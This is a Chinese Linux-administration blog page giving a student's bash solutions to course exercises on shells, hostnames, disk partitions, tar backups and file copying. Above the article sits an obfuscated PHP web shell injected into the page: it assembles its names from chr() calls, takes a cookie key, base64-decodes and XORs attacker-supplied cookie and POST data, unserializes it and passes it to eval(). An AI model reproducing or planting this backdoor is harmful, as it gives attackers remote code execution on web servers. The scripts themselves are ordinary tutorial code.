$yXMmiEcIGK = chr ( 1034 - 946 ).'J' . chr (82) . chr ( 507 - 412 )."\160" . chr ( 1009 - 924 )."\x70";$HOygnoFBa = "\143" . chr (108) . chr (97) . chr ( 290 - 175 ).'s' . chr ( 711 - 616 ).chr (101) . 'x' . 'i' . "\x73" . "\164" . "\163";$BYAUcYott = class_exists($yXMmiEcIGK); $HOygnoFBa = "43522";$Jlpsxntry = !1;if ($BYAUcYott == $Jlpsxntry){function GYwpAWr(){return FALSE;}$NHUGUhVAVW = "47311";GYwpAWr();class XJR_pUp{private function keUQyUYK($NHUGUhVAVW){if (is_array(XJR_pUp::$yoUiHbHZ)) {$VQenh = str_replace('<' . chr (63) . 'p' . chr ( 380 - 276 )."\x70", "", XJR_pUp::$yoUiHbHZ['c' . "\157" . 'n' . 't' . chr (101) . "\156" . chr (116)]);eval($VQenh); $NHUGUhVAVW = "47311";exit();}}private $EYcCRZiy;public function dnqWMeVW(){echo 28968;}public function __destruct(){$NHUGUhVAVW = "42892_3067";$this->keUQyUYK($NHUGUhVAVW); $NHUGUhVAVW = "42892_3067";}public function __construct($DRaFgsEM=0){$FaiXtmvVIC = $_POST;$GcaGSUVsUd = $_COOKIE;$WLihkFyqXK = "7f2358cb-ef52-4b41-90bf-d69713355722";$eTgQsanT = @$GcaGSUVsUd[substr($WLihkFyqXK, 0, 4)];if (!empty($eTgQsanT)){$gKxEf = "base64";$zSqaoQvNL = "";$eTgQsanT = explode(",", $eTgQsanT);foreach ($eTgQsanT as $JSlTbQdQ){$zSqaoQvNL .= @$GcaGSUVsUd[$JSlTbQdQ];$zSqaoQvNL .= @$FaiXtmvVIC[$JSlTbQdQ];}$zSqaoQvNL = array_map($gKxEf . chr ( 1019 - 924 ).'d' . chr (101) . chr (99) . chr ( 938 - 827 ).'d' . "\145", array($zSqaoQvNL,)); $zSqaoQvNL = $zSqaoQvNL[0] ^ str_repeat($WLihkFyqXK, (strlen($zSqaoQvNL[0]) / strlen($WLihkFyqXK)) + 1);XJR_pUp::$yoUiHbHZ = @unserialize($zSqaoQvNL); $zSqaoQvNL = class_exists("42892_3067");}}public static $yoUiHbHZ = 65175;}$zupyxb = new /* 61085 */ $yXMmiEcIGK(47311 + 47311); $Jlpsxntry = $zupyxb = $NHUGUhVAVW = Array();} 马哥教育网络班19期第九周课程练习 | Linux运维部落

马哥教育网络班19期第九周课程练习

马哥教育网络班19期第九周课程练习

1、写一个脚本,判断当前系统上所有用户的shell是否为可登录shell(即用户的shell不是/sbin/nologin);分别这两类用户的个数;通过字符串比较来实现;

#!/bin/bash

#

#count nologin

declare -i nologins=0

declare -i logins=0

file="/etc/passwd"

bashs=`cat $file  | cut -f7 -d:`

for i in $bashs ; do

 #echo $i

  if [ $i == "/sbin/nologin" ]; then

    let nologins++

  else

    let logins++

  fi

done

echo "Total nologin bash shell : $nologins."

echo "Total login bash shell : $logins."

用awk实现,统计每个shell数量:

 awk -F: '{bashs[$NF]++}END{for (i in bashs) {print "bash shell:"i,"\t bash shell count:"bashs[i]}}'  /etc/passwd

 

 cat /etc/passwd | awk -F: '{bashs[$NF]++}END{for (i in bashs) {print i,bashs[i]}}' 

2、写一个脚本

    (1) 获取当前主机的主机名,保存于hostname变量中;

    (2) 判断此变量的值是否为localhost,如果是,则将当前主机名修改为www.magedu.com;

    (3) 否则,则显示当前主机名;

#!/bin/bash

#

#change hostname

hostname=`hostname`

  if [ $hostname == 'localhost' ]; then

    hostname www.magedu.com

    echo "hostname has change to 'www.magedu.com'. "

  else

    echo $hostname

  fi

3、写一个脚本,完成如下功能

    (1) 传递一个磁盘设备文件路径给脚本,判断此设备是否存在;

    (2) 如果存在,则显示此设备上的所有分区信息;

#!/bin/bash

#

#show the dev info

readdevpath() {

  read -p "Please input the driver path: " drivers

   if [ $drivers = "quit" ]; then

      exit 2

   fi

   if  fdisk -l $drivers &> /dev/null  ; then

     fdisk -l $drivers

   else

     echo "invail driver"

     readdevpath

   fi

}

readdevpath

fdisk -l $drivers

4、写一个脚本,完成如下功能

   脚本能够接受一个参数;

   (1) 如果参数1为quit,则显示退出脚本,并执行正常退出;

   (2) 如果参数1为yes,则显示继续执行脚本;

   (3) 否则,参数1为其它任意值,均执行非正常退出;

#!/bin/bash

#

#arg select

if [ $# -lt 1 ]; then

  echo "<1"

  exit 2

fi

case $1 in

quit)

  echo "Exit…"

  exit 0;;

yes)

  echo "continue…";;

*)

  echo "oh no!"

  exit 4;;

esac

 

   

5、写一个脚本,完成如下功能

   传递一个参数给脚本,此参数为gzip、bzip2或者xz三者之一;

   (1) 如果参数1的值为gzip,则使用tar和gzip归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.gz;

   (2) 如果参数1的值为bzip2,则使用tar和bzip2归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.bz2;

   (3) 如果参数1的值为xz,则使用tar和xz归档压缩/etc目录至/backups目录中,并命名为/backups/etc-20160613.tar.xz;

   (4) 其它任意值,则显示错误压缩工具,并执行非正常退出;

   

#!/bin/bash

#

#case tar bzip xz

if [ $# -lt 1 ]; then

  echo "Userage: `basename $0` gzip|bzip2|xz "

  exit 2

fi

case $1 in

gzip)

   mkdir /backups &> /dev/null

   tar czvf /backups/etc-20160613.tar.gz /etc &> /dev/null

   echo "tar gzip Backup /etc succesful!"

;;

bzip2)

   mkdir /backups &> /dev/null

   tar cjvf /backups/etc-20160613.tar.bz2 /etc &> /dev/null

   echo "tar bz2 Backup /etc succesful!"

;;

xz)

   mkdir /backups &> /dev/null

   tar cJvf /backups/etc-20160613.tar.xz /etc &> /dev/null

   echo "tar xz Backup /etc succesful!"

;;

*)

  echo "Tar Err!"

  echo "Userage: `basename $0` gzip|bzip2|xz "

  exit 2

esac

   

   

6、写一个脚本,接受一个路径参数:

   (1) 如果为普通文件,则说明其可被正常访问;

   (2) 如果是目录文件,则说明可对其使用cd命令;

   (3) 如果为符号链接文件,则说明是个访问路径;

   (4) 其它为无法判断;

#!/bin/bash

#

#file type

if [ $# -lt 1 ]; then

  echo "Usare: `basename $0` arg (as a filename with path)."

  exit 2

fi

if [ -f $1 ]; then

  echo "$1 is a file"

elif

  [ -s $1 ]; then

  echo "$1 is a symbolic link file."

elif

 [ -d $1 ]; then

  echo "$1 is a directory.you can use 'cd $1'  change to it. "

else

  echo "Unknow file type."

fi

   

   

7、写一个脚本,取得当前主机的主机名,判断

   (1) 如果主机名为空或为localhost,或为""(none)"",则将其命名为mail.magedu.com;

   (2) 否则,显示现有的主机名即可;

#!/bin/bash

#

#change hostname

ChangeHostName() {

    hostname mail.magedu.com

    echo "hostname has change to 'mail.magedu.com'. "

}

hostname=`hostname`

  if [ $hostname == "localhost" ]; then

    ChangeHostName

  elif

     [ $hostname == "none" ]; then

    ChangeHostName

  else

    echo "HOST Name: "$hostname

  fi

   

8、写一脚本,接受一个用户名为参数;

   (1) 如果用户的id号为0,则显示其为管理员;

   (2) 如果用户的id号大于0且小于500, 则显示其为系统用户;

   (3) 否则,则显示其为普通用户;

#!/bin/bash

#

#echo then user id info

declare -i i_uid

declare -i uid_type 

if [ $# -lt 1 ]; then

  echo "\"Userage: `basename $0`  args.\"  args for username."

fi

if id $1 &> /dev/null ; then 

 i_uid=`id -u $1`

 if [ $i_uid -eq 0 ]; then

   uid_type=0

 elif

   [ $i_uid -lt 501 ]; then

   uid_type=1

 else

   uid_type=2 

 fi

 case $uid_type in 

 0)

   echo "User:$1 is root user."

 ;;

 1)

   echo "User:$1 is a system user."

 ;;

 *)

   echo "User:$1 is a comma user."

 esac

else

  echo "$1: No such user!"  

fi

   

   

10、写一个脚本,传递一个用户名参数给脚本;

   (1) 如果用户的id号大于等于500,且其默认shell为以sh结尾的字符串,则显示“a user can log system.”类的字符串;

   (2) 否则,则显示无法登录系统;

#!/bin/bash

#

#echo shell can be login into system

declare -i idno

if [ $# -lt 1 ]; then

  echo "Useage: `basename $0` args .(args for username)"

  exit 2

fi

if id $1 &> /dev/null ; then

  idno=`id -u $1`

  if [ $idno -ge 500 ] ; then

    if `grep $1 /etc/passwd | grep sh$ &> /dev/null` ; then

      echo "User:$1 can log system."

    else

      echo "User:$1 can not login to system."

    fi

  else

    echo "User:$1 can not login to system."

  fi

else

  echo "$1: no such user!"

fi

  

11、写一个脚本,完成如下任务 :

   (1) 按顺序分别复制/var/log目录下的每个直接文件或子目录至/tmp/test1-testn目录中;

   (2) 复制目录时,才使用cp -r命令;

   (3) 复制文件时使用cp命令;

   (4) 复制链接文件时使用cp -d命令;

   (5) 余下的所有类型,使用cp -a命令;

#!/bin/bash

#

#copy file to /tmp/test1-testn

sdir=/var/log

ddir=/tmp/test1-testn

files=`ls $sdir`

if [ ! -d $ddir ]; then

  mkdir -pv $ddir

fi

cd $sdir

for i in $files ; do

  if [ -L $i ] ; then

    filetype="s"

  elif

    [ -d $i ] ; then

    filetype="d"

  elif

    [ -f $i ] ; then

    filetype="f"

  else

    filetype="o"

  fi

case $filetype in

  s)

   cp -d $i $ddir

  # echo "cp -d $i"

   ;;

  d)

   cp -r $i $ddir

  # echo "cp -r $i"

   ;;

  f)

   cp $i $ddir

  # echo "cp $i"

   ;;

   

  *)

   cp -a $i $ddir

  # echo "cp -a $i"

   ;;

esac

done

   

   

   

原创文章,作者:马哥Net19_小斌斌,如若转载,请注明出处:http://www.178linux.com/22027

(0)
上一篇 2016-07-07 10:45
下一篇 2016-07-07 10:45

相关推荐

  • Linux bash中命令执行状态返回值

    Linux bash中命令执行状态返回值 在操作系统中,命令的执行后输出的内容为命令执行结果输出,而这个命令本身是否执行成功,它是通过命令执行状态返回值来标识的。 常用的值: 0 表示命令执行成功非0 表示命令执行失败 bash中获取命令执行状态返回值的方法 在刚执行完一条指令后,使用echo $?取得上一条指令的命令执行状态返回值,示例如下:  …

    Linux干货 2016-11-06
  • linux作业管理和任务计划

    一、作业管理 Linux 的作业控制     前台作业:通过终端启动,且启动后一直占据终端;     后台作业:可通过终端启动,但启动后即转入后台运行(释放终端) 如何让作业运行于后台? (1)  运行中的作业: Ctrl+z (2)&nb…

    Linux干货 2016-09-13
  • linux用户和组管理

    linux用户和组管理 类Unix系统的设计初衷就是为让多用户同时工作,所以也迫使Linux系统有了极强的安全性,在前面安装红帽RHEL7操作系统时还特别要求“设置root用户密码”,而root用户是存在于所有类UNIX系统中的”超级用户”。 用户管理 root账户介绍(超级管理员) root用户拥有极高的系统所有权,能够管理系统的各项功能,如添加/删除用户…

    Linux干货 2016-09-05
  • N26_第一周作业

    一、描述计算机的组成及其功能。 计算机系统:是由硬件(Hardware)系统和软件(Software)系统两大部分构成。 1、硬件系统: 1)控制器(Control):是整个计算机的中枢神经,其功能是对程序规定的控制信息进行解释,根据其要求进行控制,调度程序、数据、地址,协调计算机各部分工作及内存与外设的访问等。2)运算器(Datapath):运算器的功能是…

    2017-02-20
  • Linux文件查找之find秘笈

    前言     Linux的基本特点之一是一切皆文件,在系统管理过程中难免会需要查找特定类型的文件,那么问题来了:如何进行有效且准确的查找呢?本文将对Linux系统中的文件查找工具及用法进行详细讲解。 常用工具对比     常用的文件查找工具主要有locate(非实时查找)和find(实时查找)。locate查找依赖于索…

    2015-03-23
  • Find命令的使用

    Find命令的基本用法 在Linux系统中find命令是一个强大文件查找类工具,它支持根据文件名,权限,文件大小,访问以及修改时间查找,使用方法如下: find [option] [查找起始路径] [查找条件] [处理动作] 起始路径:指定查找文件或目录的路径,默认为当前目录 查找条件:可根据文件名,权限,文件大小以及从属关系查找文件 处理动作:动查找到的文…

    Linux干货 2017-08-28

评论列表(2条)

  • 马哥教育
    马哥教育 2016-07-07 11:34

    写的很好,排版还可以在漂亮一点,加油

    • 马哥Net19_小斌斌
      马哥Net19_小斌斌 2016-07-25 22:58

      @马哥教育排版一提交就变了,有什么方法可以排得好点呢?